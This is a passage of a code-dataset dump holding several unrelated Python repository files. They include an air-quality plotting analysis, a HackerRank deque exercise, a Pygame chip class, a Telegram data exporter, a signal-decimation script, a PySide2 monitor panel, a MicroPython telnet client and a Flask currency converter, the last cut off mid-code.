left')\nplt.savefig(r'C:\\Users\\HP\\Desktop\\北京天津PM2.5,PM10,NO2,CO,SO2,O3月平均含量.png')\nplt.show()\n\n# 对日期和质量等级分组\nano_new_fp1_group = new_fp1.groupby(by=['日期', '质量等级'])\nano_new_fp1_group = ano_new_fp1_group.agg(len)\nano_new_fp2_group = new_fp2.groupby(by=['日期', '质量等级'])\nano_new_fp2_group = ano_new_fp2_group.agg(len)\n# 对数据进行简单处理让其直观\nano_new_fp1_group.drop(ano_new_fp1_group.iloc[:, 1::], axis=1, inplace=True)\nano_new_fp1_group = ano_new_fp1_group.rename(columns={'AQI': '天数'})\nprint(ano_new_fp1_group)\n''' ���数\n日期 质量等级 \n10月 中度污染 2\n 优 8\n 良 18\n 轻度污染 1\n 重度污染 1\n11月 中度污染 1\n 优 7\n 良 15\n 轻度污染 7\n12月 良 6\n 轻度污染 1\n9月 优 8\n 良 16\n 轻度污染 6'''\n\nano_new_fp2_group.drop(ano_new_fp2_group.iloc[:, 1::], axis=1, inplace=True)\nano_new_fp2_group = ano_new_fp2_group.rename(columns={'AQI': '天数'})\nprint(ano_new_fp2_group)\n''' 天数\n日期 质量等级 \n10月 中度污染 1\n 优 19\n 良 10\n 轻度污染 1\n11月 中度污染 2\n 优 9\n 良 14\n 轻度污染 5\n12月 优 5\n 良 2\n9月 优 17\n 良 10\n 轻度污染 3\n'''\ntwo_pie_draw('天数', r'天津9,10,11,12月空气质量', r'北京9,10,11,12月空气质量', '北京天津两市空气质量对比(分)', ano_new_fp1_group,\n ano_new_fp2_group)\n# 对天津市9,10,11,12月的数据进行分析得出以上结论\n\n# 开始绘图,初步分析数据,绘制折线图较为直观。\n# 定义一个函数绘制该折线图\n\n\ndef draw_api(x, y, name, file1, file2):\n # 设置中文字体\n font = {'family': 'MicroSoft YaHei',\n 'size': '12'}\n matplotlib.rc('font', **font)\n # 设置图片大小\n plt.figure(figsize=(27, 20), dpi=80)\n x_zhou = range(2, 2*len(fp1[x]) + 2, 2)\n y1_zhou = file1[y]\n y2_zhou = file2[y]\n plt.plot(x_zhou, y1_zhou, label='天津')\n plt.plot(x_zhou, y2_zhou, label='北京')\n # 设置x,y轴刻度\n x_ticks = file1[x].agg(lambda a: a.replace('2021/', ''))\n plt.xticks(x_zhou, x_ticks, rotation=60)\n lst = [min(y1_zhou), max(y1_zhou), min(y2_zhou), max(y2_zhou)]\n y_ticks = range(min(lst), max(lst) + 1, 4)\n plt.yticks(y_ticks)\n # 添加描述信息\n plt.xlabel(x)\n plt.ylabel(y)\n plt.title(name)\n # 添加网格\n plt.grid(visible=True)\n # 设置图例\n plt.legend(loc='upper left')\n plt.savefig(r'C:\\Users\\HP\\Desktop\\{}.png'.format(name))\n plt.show()\n\n\ndraw_api('日期', 'AQI', 'AQI折线图', file1=fp1, file2=fp2)\n\n# 绘制天津市9/1-12/7日每天的各个物质的浓度\n# 设置x的刻度\nfp1_x_ = fp1['日期'].agg(lambda a: a.replace('2021/', ''))\nfp1_y_pm25 = fp1['PM2.5']\nfp1_y_pm10 = fp1['PM10']\nfp1_y_no2 = fp1['NO2']\nfp1_y_co = fp1['CO']\nfp1_y_so2 = fp1['SO2']\nfp1_y_o3 = fp1['O3_8h']\n# 设置图片大小\nplt.figure(figsize=(27, 20), dpi=80)\n# 多次绘图将PM2.5,PM10,NO2,CO,SO2,O3月平均含量均在图中画出来\nplt.plot(fp1_x_, fp1_y_co, label='CO')\nplt.plot(fp1_x_, fp1_y_so2, label='SO2')\nplt.plot(fp1_x_, fp1_y_o3, label='O3')\nplt.plot(fp1_x_, fp1_y_no2, label='NO2')\nplt.plot(fp1_x_, fp1_y_pm10, label='PM10')\nplt.plot(fp1_x_, fp1_y_pm25, label='PM25')\n# 设置XY轴\nplt.xticks(rotation=60)\nplt.yticks(range(0, 200, 4))\n# 添加描述信息\nplt.xlabel('日期', fontsize=12)\nplt.ylabel('浓度μg/m3(CO为mg/m3)', fontsize=12)\nplt.title('天津市每日PM2.5,PM10,NO2,CO,SO2,O3含量', fontsize=12)\n# 设置网格\nplt.grid(alpha=0.4)\n# 设置图例\nplt.legend(loc='upper left')\nplt.savefig(r'C:\\Users\\HP\\Desktop\\天津PM2.5,PM10,NO2,CO,SO2,O3日含量.png')\nplt.show()\n\n\n# 绘制北京市9/1-12/7日每天的各个物质的浓度\n# 设置x的刻度\nfp2_x_ = fp2['日期'].agg(lambda a: a.replace('2021/', ''))\nfp2_y_pm25 = fp2['PM2.5']\nfp2_y_pm10 = fp2['PM10']\nfp2_y_no2 = fp2['NO2']\nfp2_y_co = fp2['CO']\nfp2_y_so2 = fp2['SO2']\nfp2_y_o3 = fp2['O3_8h']\n# 设置图片大小\nplt.figure(figsize=(27, 20), dpi=80)\n# 多次绘图将PM2.5,PM10,NO2,CO,SO2,O3月平均含量均在图中画出来\nplt.plot(fp2_x_, fp2_y_co, label='CO')\nplt.plot(fp2_x_, fp2_y_so2, label='SO2')\nplt.plot(fp2_x_, fp2_y_o3, label='O3')\nplt.plot(fp2_x_, fp2_y_no2, label='NO2')\nplt.plot(fp2_x_, fp2_y_pm10, label='PM10')\nplt.plot(fp2_x_, fp2_y_pm25, label='PM25')\n# 设置XY轴\nplt.xticks(rotation=60)\nplt.yticks(range(0, 200, 4))\n# 添加描述信息\nplt.xlabel('日期', fontsize=12)\nplt.ylabel('浓度μg/m3(CO为mg/m3)', fontsize=12)\nplt.title('北京市每日PM2.5,PM10,NO2,CO,SO2,O3含量', fontsize=12)\n# 设置网格\nplt.grid(alpha=0.4)\n# 设置图例\nplt.legend(loc='upper left')\nplt.savefig(r'C:\\Users\\HP\\Desktop\\北京PM2.5,PM10,NO2,CO,SO2,O3日含量.png')\nplt.show()\n\n'''\n反思:\n1.数据问题\n找到的数据与所学营销专业并无太大关联,仅仅是凭自己的兴趣找的这组数,这组数据相对简单,数据内容少,数据处理过程相对简单,难度较低。\n2.写代码时遇到的问题\n在导入文件时出现了部分未见过的问题:\n(1.文件编码问题UnicodeDecodeError: 'utf-8' codec can't decode byte 0xd0 in position 0: invalid continuation byte\n(2.csv文件打开错误_csv.Error: line contains NULL byte\n解决办法\n(1.utf-8没办法成功换用gbk\n(2.csv文件打开错误是由于保存时扩展名为xls或xlsx,而将其改为csv文件,因此将文件另存为\ncsv文件即可。\n在绘图时,\n汉字无法在图中显示出来,使用matplotlib.rc函数声明字体\n折线图:因为xy轴刻度太过密集无法看清,改变y轴刻度步长,将x轴刻度删除不必要的内容并进行\n旋转\n饼状图:由于部分内容占比太少导致文字重合,暂未找到好的方法解决\n'''","repo_name":"crushwhite/DataAnalysis","sub_path":"case 2 simple analysis.py","file_name":"case 2 simple analysis.py","file_ext":"py","file_size_in_byte":15861,"program_lang":"python","lang":"zh","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"18187507959","text":"# input:\n# The first line contains an integer N, the number of operations.\n# The next N lines contains the space separated names of methods and their values.\n\"\"\"\n6\nappend 1\nappend 2\nappend 3\nappendleft 4\npop\npopleft\n\"\"\"\n# output: 1 2\n\n# Enter your code here. Read input from STDIN. Print output to STDOUT\nfrom collections import deque\nd = deque()\n\nN = int(input())\nfor i in range(N):\n cmd = input().split()\n if len(cmd) == 1:\n eval( \"\".join([\"d.\",cmd[0],\"()\"]) )\n else:\n eval( \"\".join([\"d.\",cmd[0],\"(\",cmd[1],\")\"]) )\n\nprint(*d)\n","repo_name":"DuverneyCM/hackerrank","sub_path":"python/collections/deque.py","file_name":"deque.py","file_ext":"py","file_size_in_byte":551,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"33327188330","text":"from database.bd_connexion import *\nfrom controllers.__init__ import *\nimport random\n\nclass model_client:\n\n @classmethod\n def register(self, id_perfil = None):\n done = None\n try:\n db_register(f\"\"\"\n INSERT INTO cliente (id_perfil,fotos_compradas) \n VALUES({id_perfil},0);\n \"\"\")\n done = True\n except:\n done = False\n return done\n \n ","repo_name":"LuisFlores2170/evento_fotografico","sub_path":"models/model_client.py","file_name":"model_client.py","file_ext":"py","file_size_in_byte":443,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"40388874116","text":"#!/usr/bin/env python\r\nimport pygame\r\nimport sprite\r\n\r\nclass Chip(object):\r\n #--make sure you keep all the init variables(ID, owner, colour, is_falling), class variables, print_chips(), and the return values for gravity(). They'll be needed for the main loop-- \r\n all_chips = {}\r\n def __init__(self, ID, owner, colour, x, y, width, height, vel, image=None, is_falling=False):\r\n self.ID = ID\r\n self.owner = owner\r\n self.colour = colour\r\n self.x = x\r\n self.y = y\r\n self.width = width\r\n self.height = height\r\n self.vel = vel\r\n self.image = image\r\n self.is_falling = is_falling\r\n Chip.all_chips[self.ID] = self\r\n\r\n def move(self, mouse_pos):\r\n #--checking and adjusting chip's position--\r\n if mouse_pos < 80:\r\n self.x = 0\r\n if mouse_pos > 80 and mouse_pos < 160:\r\n self.x = 80\r\n if mouse_pos > 160 and mouse_pos < 240:\r\n self.x = 160\r\n if mouse_pos > 240 and mouse_pos < 320:\r\n self.x = 240\r\n if mouse_pos > 320 and mouse_pos < 400:\r\n self.x = 320\r\n if mouse_pos > 400 and mouse_pos < 480:\r\n self.x = 400\r\n if mouse_pos > 480 :\r\n self.x = 480\r\n\r\n def gravity(self, other):\r\n #gravity changes chips y then return wether it's y has hit the limit\r\n if other.collision(self.x, self.y) != True and self.is_falling == True:\r\n self.y += self.vel\r\n self.vel += 1\r\n return 0\r\n else:\r\n self.is_falling = False\r\n self.y = other.y - self.height\r\n return 1\r\n\r\n @classmethod\r\n def draw_chips(cls, screen):\r\n for chip in cls.all_chips.values():\r\n if chip.image == None:\r\n pygame.draw.circle(screen, chip.colour, (chip.x + 40, chip.y), chip.width)\r\n else:\r\n image = pygame.transform.scale(chip.image, (chip.width, chip.height))\r\n screen.blit(image, (chip.x, chip.y))","repo_name":"AlanHianWu/Half-Oreo","sub_path":"Chip.py","file_name":"Chip.py","file_ext":"py","file_size_in_byte":1929,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"34243160169","text":"\"\"\"Exporter Engine.\"\"\"\nfrom __future__ import annotations\n\nimport logging\nfrom configparser import ConfigParser\nfrom typing import Dict, List\n\nfrom TEx.exporter.exporter_base import BaseExporter\nfrom TEx.exporter.pandas_rolling_exporter import PandasRollingExporter\nfrom TEx.models.facade.finder_notification_facade_entity import FinderNotificationMessageEntity\n\nlogger = logging.getLogger('TelegramExplorer')\n\n\nclass ExporterEngine:\n \"\"\"Primary Export Engine.\"\"\"\n\n def __init__(self) -> None:\n \"\"\"Initialize Exporter Engine.\"\"\"\n self.exporters: Dict = {}\n\n def __load_exporters(self, config: ConfigParser) -> None:\n \"\"\"Load all Registered Exporters.\"\"\"\n registered_exporters: List[str] = [item for item in config.sections() if 'EXPORTER.' in item]\n\n for register in registered_exporters:\n if 'ROLLING_PANDAS' in register:\n\n exporter: PandasRollingExporter = PandasRollingExporter()\n exporter.configure(config=config[register], source=config['CONFIGURATION']['phone_number'])\n\n self.exporters.update({\n register: {'instance': exporter},\n })\n\n def configure(self, config: ConfigParser) -> None:\n \"\"\"Configure Finder.\"\"\"\n self.__load_exporters(config)\n\n async def run(self, exporters: List[str], entity: FinderNotificationMessageEntity, rule_id: str) -> None:\n \"\"\"Dispatch all Exporting Processes.\"\"\"\n if len(exporters) == 0:\n return\n\n for dispatcher_name in exporters:\n\n target_exporter: BaseExporter = self.exporters[dispatcher_name]['instance']\n\n try:\n await target_exporter.run(entity=entity, rule_id=rule_id)\n\n except Exception as _ex: # Yes, Catch All\n logging.exception('Unable to Export Data')\n\n async def shutdown(self) -> None:\n \"\"\"Shutdown all Exporters and Flush all to Disk.\"\"\"\n for dispatcher_name in self.exporters:\n\n target_exporter: BaseExporter = self.exporters[dispatcher_name]['instance']\n\n try:\n target_exporter.shutdown()\n\n except Exception as _ex: # Yes, Catch All\n logging.exception(f'Unable to Shutdown the \"{dispatcher_name}\" Exporter Gracefully. Data may be lost.')\n","repo_name":"guibacellar/TEx","sub_path":"TEx/exporter/exporter_engine.py","file_name":"exporter_engine.py","file_ext":"py","file_size_in_byte":2326,"program_lang":"python","lang":"en","doc_type":"code","stars":180,"dataset":"github-code","pt":"40"} +{"seq_id":"25888246195","text":"# -*- coding: utf-8 -*-\n\nfrom django.core.management.base import BaseCommand, CommandError\nfrom web.models import *\nfrom django.contrib.auth.models import User\nimport codecs\n\nclass Command(BaseCommand):\n help = 'Fill the database with question for tests. The document to import must be named: questions.txt'\n\n def add_arguments(self, parser):\n parser.add_argument(\n '--import',\n action='store_true',\n dest='import',\n help='Crea info real.',\n )\n parser.add_argument(\n '--beta',\n action='store_true',\n dest='beta',\n help='Crea info para modo dummy.',\n )\n def handle(self, *args, **options):\n\n if (options['beta']):\n return 0\n\n if (options['import']):\n #Importamos un archivo de preguntas, llamado questions.csv\n print(\"Importando preguntas...\")\n preguntas = open('questions.csv', encoding='utf-8')\n if not preguntas:\n print(\"Error: archivo questions.csv no encontrado\")\n return -1\n for pregunta in preguntas:\n pregunta = pregunta.strip().split(';')\n #print(pregunta[0])\n q = QuestionModel()\n q.statement = pregunta[1]\n q.optionA = pregunta[2]\n q.optionB = pregunta[3]\n q.optionC = pregunta[4]\n q.optionD = pregunta[5]\n q.correct = pregunta[6]\n experiencia = ExperienceModel.objects.filter(name=pregunta[0])\n #print(experiencia[0].pk)\n q.experience = experiencia[0]\n q.save()\n","repo_name":"roloow/umvral","sub_path":"web-service/webumvral/web/management/commands/questions.py","file_name":"questions.py","file_ext":"py","file_size_in_byte":1703,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"1343677441","text":"#!/usr/bin/env python3\n\nimport sys\nimport os\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport scipy.signal as sgn\nimport scipy.interpolate as spint\n\nfrom shutil import copyfile\n\nSET_DPI = 100\nFIGSIZE = (18, 10)\n\n\ndef decimate_data(filename, newfreq=40):\n data = np.genfromtxt(filename + '.tsv.gz')\n f = spint.interp1d(data[:, 0], data[:, ], axis=0, fill_value='extrapolate')\n data_tdec = np.arange(data[0, 0], data[-1, 0], 1/newfreq)\n data_dec = f(data_tdec)\n del data\n np.savetxt(filename + '_dec.tsv.gz', data_dec)\n return data_dec\n\n\ndef filter_signal(data_dec, bw_ppg=[0.5/20, 8/20], bw=2/20):\n ba = sgn.butter(7, bw, 'lowpass')\n ba_ppg = sgn.butter(7, bw_ppg, 'bandpass')\n data_filt = np.empty(data_dec.shape)\n data_filt[:, 0] = data_dec[:, 0]\n for ch in range(1, data_filt.shape[1]):\n if ch == data_filt.shape[1] - 3:\n data_filt[:, ch] = sgn.filtfilt(ba_ppg[0], ba_ppg[1], data_dec[:, ch])\n else:\n data_filt[:, ch] = sgn.filtfilt(ba[0], ba[1], data_dec[:, ch])\n\n np.savetxt(filename + '_filt.tsv.gz', data_filt)\n return data_filt\n\n\ndef plot_all(data, filename, start=100, end=500, dpi=SET_DPI, size=FIGSIZE):\n ch_num = data.shape[1] # get number of channels:\n fig, ax = plt.subplots(ch_num - 1, 1, figsize=size, sharex=True)\n time = data[:, 0] # assume time is first channel\n fig.suptitle(os.path.basename(filename))\n for ch in range(1, ch_num):\n ax[ch - 1].plot(time[start:end], data[start:end, ch])\n ax[ch - 1].set_title(f' Channel {ch}')\n ax[ch - 1].grid()\n ax[ch - 1].set_xlabel('seconds')\n fig.savefig(f'{filename}.png', dpi=dpi, figsize=size, bbox_inches='tight')\n\n\nwdir = sys.argv[1]\nsub = sys.argv[2]\n\ncwd = os.getcwd()\n\nos.chdir(wdir)\n\nfor ses in range(1, 12):\n\n for task in ['motor', 'simon', 'pinel', 'rest_run-01',\n 'rest_run-02', 'rest_run-03', 'rest_run-04']:\n os.chdir(wdir)\n path = f'sub-{sub}/ses-{ses:02g}/func'\n filename = f'sub-{sub}_ses-{ses:02g}_task-{task}_physio'\n try:\n os.chdir(path)\n try:\n os.mkdir('../func_phys')\n except:\n print('Folder func_phys already exists')\n\n os.chdir('../func_phys')\n try:\n print(f'Copying file {filename}')\n copyfile(f'../func/{filename}.tsv.gz', f'./{filename}.tsv.gz')\n except:\n print('Cannot copy file')\n\n print(f'Decimating {filename}')\n\n data_dec = decimate_data(f'./{filename}')\n data_filt = filter_signal(data_dec)\n\n plot_all(data_filt, f'./{filename}_filt', 100, 500)\n plot_all(data_dec, f'./{filename}_dec', 100, 500)\n plt.close('all')\n except Exception:\n print(f'Something went awry. Check {sub} {ses:02g} {task}.')\n\nos.chdir(cwd)\n","repo_name":"smoia/EuskalIBUR_dataproc","sub_path":"20.python_scripts/new_biopac_decimate.py","file_name":"new_biopac_decimate.py","file_ext":"py","file_size_in_byte":2903,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"40"} +{"seq_id":"14767775366","text":"def openfile():\n\t#fileloc = input(\"Enter file name: \")\n\tfileloc=(\"GDP.txt\")\n\ttry:\n\t\tfp = open(fileloc)\n\t\treturn fp\n\texcept FileNotFoundError:\n\t\tprint(\"File not found.\")\n\t\tfp=openfile()\n\t\treturn fp\n\ndef find_min_percent(line):\n\ti=0\n\tline=line-1\n\twhile ifloat(maxval):\n\t\t\t\tmaxval=currval\n\t\t\t\tmaxval_index=(x*12)\n\t\t\t\tlinetxt=linetxt[12:]\n\t\t\telse:\n\t\t\t\tlinetxt=linetxt[12:]\n\t\texcept ValueError:\n\t\t\tprint(\"Current Val is: \",currval)\n\t\t\tprint(\"Maxval is: \",maxval)\n\treturn(maxval,maxval_index)\n\ndef find_gdp(line,index):\n\tfpgdp=openfile()\n\ti=0\n\tline=line-1\n\twhile i999.9:\n\t\tbill_or_millmin=\"trillion\"\n\t\tmin_val_gdp=float(min_val_gdp)/1000\n\t\tmin_val_gdp='{:2,.2f}'.format(float(min_val_gdp))\n\tif float(max_val_gdp)>999.9:\n\t\tbill_or_millmax=\"trillion\"\n\t\tmax_val_gdp=float(max_val_gdp)/1000\n\t\tmax_val_gdp='{:2,.2f}'.format(float(max_val_gdp))\n\tprint(\"The minimum change in GDP was \",min_val,\" percent in\",min_year, \" when the GDP was \",min_val_gdp,\" \",bill_or_millmin,\" dollars.\")\n\tprint(\"The maximum change in GDP was \",max_val,\" percent in\",max_year,\" when the GDP was \",max_val_gdp,\" \",bill_or_millmax,\" dollars.\")\n#Gross Domestic Product\n#The minimum change in GDP was -2.8 percent in 2009 when the GDP was 14.42 trillion dollars.\n#The maximum change in GDP was 7.3 percent in 1984 when the GDP was 4.04 trillion dollars.\nfpmin=openfile()\nfpmax=openfile()\n\n\nminval,minval_index=find_min_percent(9)\nmaxval,maxval_index=find_max_percent(9)\ngdp_min=find_gdp(44,552)\ngdp_max=find_gdp(44,257)\n#print (minval,minval_index)\n#print(maxval,maxval_index)\n#print(gdp_min,gdp_max)\ndisplay(minval,2009,gdp_min,maxval,1984,gdp_max)","repo_name":"ndragon798/cse231","sub_path":"Fall 2016/Project04/proj4.py","file_name":"proj4.py","file_ext":"py","file_size_in_byte":2731,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"23627115585","text":"from PySide2.QtWidgets import QWidget, QFrame, QHBoxLayout, QVBoxLayout, QGridLayout, \\\n QLabel, QGroupBox, QButtonGroup, QRadioButton, QPushButton\nfrom PySide2.QtGui import QFont\nfrom PySide2.QtCore import Qt\nimport usb_msg as um\n\nclass ReadLoad(QFrame):\n def __init__(self, parent, usbif):\n super().__init__(parent)\n \n self._s1_s2_switches = {}\n self._usbif = usbif\n\n self._setup_ui()\n\n usbif.send(um.WriteControlLoadReadS1S2(0, 0, 0, 0, 0))\n\n def _update_s1_s2_switches(self, state):\n switch_states = {switch: self._s1_s2_switches[switch].isChecked() for switch in self._s1_s2_switches.keys()}\n self._usbif.send(um.WriteControlLoadReadS1S2(**switch_states))\n\n def _setup_ui(self):\n self.setFrameStyle(QFrame.StyledPanel | QFrame.Raised)\n\n layout = QHBoxLayout(self)\n self.setLayout(layout)\n layout.setMargin(1)\n layout.setSpacing(1)\n\n adv_widget = QWidget(self)\n layout.addWidget(adv_widget)\n adv_layout = QVBoxLayout(adv_widget)\n adv_layout.addSpacing(15)\n l = QLabel('ADV\\nS', adv_widget)\n l.setAlignment(Qt.AlignCenter)\n font = l.font()\n font.setPointSize(7)\n font.setBold(True)\n l.setFont(font)\n adv_layout.addWidget(l)\n\n b = QPushButton(adv_widget)\n b.setFixedSize(20,20)\n b.pressed.connect(lambda: self._usbif.send(um.WriteControlAdvanceS()))\n adv_layout.addWidget(b)\n adv_layout.setAlignment(b, Qt.AlignCenter)\n\n l = QLabel('CRS\\nPARITY', adv_widget)\n l.setFont(font)\n l.setAlignment(Qt.AlignCenter)\n adv_layout.addWidget(l, Qt.AlignCenter)\n\n b1, b2, b3, s1, s2, s3 = self._create_switch_group(layout, 'LOAD', 'PRESET\\nCHAN',\n ['ODD', 'EVEN'], ['S1', 'S2'], ['S1', 'S2'])\n b1.pressed.connect(lambda: self._usbif.send(um.WriteControlLoadS()))\n b2.pressed.connect(lambda: self._usbif.send(um.WriteControlLoadPreset()))\n b3.pressed.connect(lambda: self._usbif.send(um.WriteControlLoadChan()))\n self._s1_s2_switches['load_preset'] = s2\n self._s1_s2_switches['load_chan'] = s3\n s2.toggled.connect(self._update_s1_s2_switches)\n s3.toggled.connect(self._update_s1_s2_switches)\n\n b1, b2, b3, s1, s2, s3 = self._create_switch_group(layout, 'READ', 'PRESET\\nCHAN',\n None, ['S1', 'S2'], ['S1', 'S2'])\n b1.pressed.connect(lambda: self._usbif.send(um.WriteControlReadS()))\n b2.pressed.connect(lambda: self._usbif.send(um.WriteControlReadPreset()))\n b3.pressed.connect(lambda: self._usbif.send(um.WriteControlReadChan()))\n self._s1_s2_switches['read_preset'] = s2\n self._s1_s2_switches['read_chan'] = s3\n s2.toggled.connect(self._update_s1_s2_switches)\n s3.toggled.connect(self._update_s1_s2_switches)\n\n b1, b2, b3, s1, s2, s3 = self._create_switch_group(layout, 'START', '\\nRESTART',\n None, ['S1', 'S2'], None)\n b1.pressed.connect(lambda: self._usbif.send(um.WriteControlStartS()))\n b2.pressed.connect(lambda: self._usbif.send(um.WriteControlStartPreset()))\n b3.pressed.connect(lambda: self._usbif.send(um.WriteControlStart()))\n self._s1_s2_switches['start_preset'] = s2\n s2.toggled.connect(self._update_s1_s2_switches)\n\n pro_widget = QWidget(self)\n layout.addWidget(pro_widget)\n pro_layout = QVBoxLayout(pro_widget)\n pro_layout.addSpacing(15)\n\n l = QLabel('PROCEED', pro_widget)\n l.setAlignment(Qt.AlignCenter)\n l.setFont(font)\n pro_layout.addWidget(l)\n\n b = QPushButton(pro_widget)\n b.setFixedSize(20,20)\n pro_layout.addWidget(b)\n pro_layout.setAlignment(b, Qt.AlignCenter | Qt.AlignTop)\n b.pressed.connect(lambda: self._usbif.send(um.WriteControlProceed()))\n\n l = QLabel('RESET\\nERROR', pro_widget)\n l.setAlignment(Qt.AlignCenter)\n l.setFont(font)\n pro_layout.addWidget(l)\n\n b = QPushButton(pro_widget)\n b.setFixedSize(20,20)\n pro_layout.addWidget(b)\n pro_layout.setAlignment(b, Qt.AlignCenter | Qt.AlignTop)\n\n\n def _create_switch_group(self, layout, group_name, button3, switch1, switch2, switch3):\n group_box = QGroupBox(group_name, self)\n layout.addWidget(group_box)\n group_layout = QGridLayout(group_box)\n group_box.setLayout(group_layout)\n group_layout.setMargin(0)\n group_layout.setSpacing(0)\n \n l = QLabel('S', group_box)\n l.setAlignment(Qt.AlignCenter)\n\n font = l.font()\n font.setPointSize(7)\n font.setBold(True)\n l.setFont(font)\n l.setMinimumWidth(30)\n group_layout.addWidget(l, 0, 0, Qt.AlignBottom)\n\n l = QLabel('PRESET', group_box)\n l.setAlignment(Qt.AlignCenter)\n l.setFont(font)\n l.setMinimumWidth(30)\n group_layout.addWidget(l, 0, 1, Qt.AlignBottom)\n\n l = QLabel(button3, group_box)\n l.setAlignment(Qt.AlignCenter)\n l.setFont(font)\n l.setMinimumWidth(30)\n group_layout.addWidget(l, 0, 2, Qt.AlignBottom)\n\n b1 = QPushButton(group_box)\n b1.setFixedSize(20,20)\n group_layout.addWidget(b1, 1, 0, Qt.AlignCenter)\n\n b2 = QPushButton(group_box)\n b2.setFixedSize(20,20)\n group_layout.addWidget(b2, 1, 1, Qt.AlignCenter)\n\n b3 = QPushButton(group_box)\n b3.setFixedSize(20,20)\n group_layout.addWidget(b3, 1, 2, Qt.AlignCenter)\n\n s1 = self._create_switch(group_box, group_layout, 0, switch1)\n s2 = self._create_switch(group_box, group_layout, 1, switch2)\n s3 = self._create_switch(group_box, group_layout, 2, switch3)\n\n return b1, b2, b3, s1, s2, s3\n\n def _create_switch(self, box, layout, col, labels):\n if labels is None:\n return None\n\n l = QLabel(labels[0], box)\n l.setMinimumHeight(20)\n l.setAlignment(Qt.AlignCenter | Qt.AlignBottom)\n\n font = l.font()\n font.setPointSize(7)\n font.setBold(True)\n l.setFont(font)\n layout.addWidget(l, 3, col, Qt.AlignBottom | Qt.AlignCenter)\n\n r1 = QRadioButton(box)\n r1.setStyleSheet('QRadioButton::indicator{subcontrol-position:center;}')\n layout.addWidget(r1, 4, col, Qt.AlignCenter)\n\n r2 = QRadioButton(box)\n r2.setStyleSheet('QRadioButton::indicator{subcontrol-position:center;}')\n layout.addWidget(r2, 5, col, Qt.AlignCenter)\n\n l = QLabel(labels[1], box)\n l.setAlignment(Qt.AlignCenter)\n l.setFont(font)\n layout.addWidget(l, 6, col, Qt.AlignTop | Qt.AlignCenter)\n\n g = QButtonGroup(box)\n g.addButton(r1)\n g.addButton(r2)\n r1.setChecked(True)\n\n return r2\n","repo_name":"thewonderidiot/agc_monitor","sub_path":"client/agc_monitor/read_load.py","file_name":"read_load.py","file_ext":"py","file_size_in_byte":6994,"program_lang":"python","lang":"en","doc_type":"code","stars":19,"dataset":"github-code","pt":"40"} +{"seq_id":"31588038857","text":"import requests, sys\nimport json\n\nserver = \"https://rest.ensembl.org\"\next = \"/homology/id/ENSG00000157764?sequence=cdna\"\n\nr = requests.get(server+ext, headers={ \"Content-Type\" : \"application/json\"})\n\nif not r.ok:\n r.raise_for_status()\n sys.exit()\n\njs_decoded = r.json()\n# jtxt= str(repr(decoded))\n# print(jtxt)\n\n# jsonObject = json.loads(jtxt)\nfor key in js_decoded:\n print(key)\n # value = js_decoded[key][\"homologies\"]\n value = js_decoded[key][0]['homologies']\n for homo in value:\n print(len(homo['source']['align_seq']))\n print(len(homo['target']['align_seq']))\n # ['target'])\n print(\">>> \\n\\n\\n\")\n\n# the result is a Python dictionary:\n","repo_name":"Kuanhao-Chao/Wheeler_Graph_Toolkit","sub_path":"data/multiseq_alignment/Ensembl_REST/homologous_alingments.py","file_name":"homologous_alingments.py","file_ext":"py","file_size_in_byte":656,"program_lang":"python","lang":"en","doc_type":"code","stars":10,"dataset":"github-code","pt":"40"} +{"seq_id":"35947697558","text":"# -*- coding: utf-8 -*-\nimport time\nimport logging\nimport telnetlib\n\nlog = logging.getLogger(__name__)\n\n\nclass TelnetClient:\n\n def __init__(self, host, user, pwd, ttl=15):\n self.host = host\n self.user = user\n self.pwd = pwd\n self.ttl = ttl\n self.tn = None\n\n def soft_reset(self):\n self.write('raise SystemExit')\n log.info('Soft reset executed')\n\n def hard_reset(self):\n self.write('import machine')\n self.write('machine.reset()')\n self.write('\\x04')\n log.info('Machine reseted.')\n\n def open(self):\n self.tn = telnetlib.Telnet(self.host, 23, self.ttl)\n if b'Login as: ' in self.tn.read_until(b'Login as: ', self.ttl):\n log.info('Connection established')\n self.write(self.user)\n if b'Password:' in self.tn.read_until(b'Password:', self.ttl):\n time.sleep(0.2)\n self.write(self.pwd)\n sentinel = b'for more information.'\n if sentinel in self.tn.read_until(sentinel, self.ttl):\n log.info('Login success.')\n return self.tn\n raise ConnectionError('Connection failed :(')\n\n def write(self, s):\n self.tn.write(bytes(s, 'ascii') + b\"\\r\\n\")\n\n def close(self):\n if self.tn:\n self.tn.close()\n self.tn = None\n log.info('Connection closed')\n","repo_name":"titusz/followlight","sub_path":"tools/telnet.py","file_name":"telnet.py","file_ext":"py","file_size_in_byte":1415,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"40"} +{"seq_id":"34040495631","text":"import os\nimport requests\n\nfrom flask import Flask, send_from_directory\nfrom flask_restful import Resource, Api\nfrom webargs import fields\nfrom webargs.flaskparser import use_args\nfrom apscheduler.schedulers.background import BackgroundScheduler\n\nrates_token = \"token must be here\"\nstatic_file_dir = os.path.join(os.path.dirname(os.path.realpath(__file__)), 'static')\n\napp = Flask(__name__)\napi = Api(app)\n\n\n@app.route('/', methods=['GET'])\ndef serve_dir_directory_index():\n return send_from_directory(static_file_dir, 'index.html')\n\n\nclass ApiResource(Resource):\n currency_args = {\n 'from': fields.Str(required=True),\n 'to': fields.Str(required=True),\n 'value': fields.Float(required=True),\n }\n\n @use_args(currency_args)\n def get(self, args):\n rate_from = rates_data.get(args['from'])\n rate_to = rates_data.get(args['to'])\n value = args['value']\n return {'value': value * rate_to / rate_from}\n\n\napi.add_resource(ApiResource, '/api/')\n\n\nclass RatesStore:\n def __init__(self):\n self.rates_data = None\n self.update_rates()\n sched = BackgroundScheduler(daemon=True)\n sched.add_job(self.update_rates, 'interval', hours=24)\n sched.start()\n\n def update_rates(self):\n params = {'app_id': rates_token}\n r = requests.get('https://openexchangerates.org/api/latest.json', params=params)\n self.rates_data = r.json()\n\n def get(self, 